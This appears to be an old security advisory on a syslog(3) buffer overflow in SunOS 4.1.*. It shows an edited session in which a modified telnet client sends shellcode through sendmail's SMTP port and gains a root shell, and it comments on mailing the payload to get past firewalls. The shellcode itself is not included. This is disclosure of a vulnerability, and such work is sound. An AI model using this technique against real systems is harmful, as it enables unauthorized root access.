

    SunOS 4.1.*, possible others.


    syslog(3)  uses  an  internal  buffer  to build messages.  However
    it performs no bound checking,  and relies on the caller  to check
    arguments passed  to it.  Local and  remote users  can obtain root
    access.   Here  is  a  edited  sample  of  using a modified telnet
    client  to  obtain  a  root  shell  through SunOS sendmail(8) on a
    sparc based machine.

        legless[8lgm]% syslog_telnet localhost smtp
        Trying ...
        Connected to localhost.
        Escape character is '^]'.
        220 Sendmail 4.1/SMI-4.1 ready at Sun,\
         27 Aug 95 15:56:27 BST
        mail from: root
        250 root... Sender ok
        rcpt to: root
        250 root... Recipient ok
        354 Enter mail, end with "." on a line by itself

        ### At this point, we provide some information to the modified
        ### telnet client about the remote host.  Then sparc instructions
        ### are sent over the link  within the body of the message  to
        ### execute a shell.
        ### As soon as data is finished (with .), sendmail will eventually
        ### report, through syslog(3), data about this message.  syslog's
        ### internal  buffer  will  be  overwritten, and our supplied
        ### instructions are executed.

        Hit <cr>, then .<cr>

        uid=0(root) gid=0(wheel) groups=0(wheel)
        /bin/sh: ^M: not found
          3:57pm  up  1:25,  5 users,  load average: 0.11, 0.05, 0.00
        /bin/sh: ^M: not found
        Connection closed by foreign host.

        ### Here we can see that sendmail has execed a shell as root,
        ### and that we can type commands.  (lines ending in ; are
        ### user input through the telnet client).
        ### This exploit could be further expanded upon to encapsulate
        ### instructions within the body of a message, which can then
        ### be mailed out to a site (ie without the necessity to connect
        ### directly to the smtp port).  This may be used to bypass
        ### firewalls.


    Contact vendors for fixes.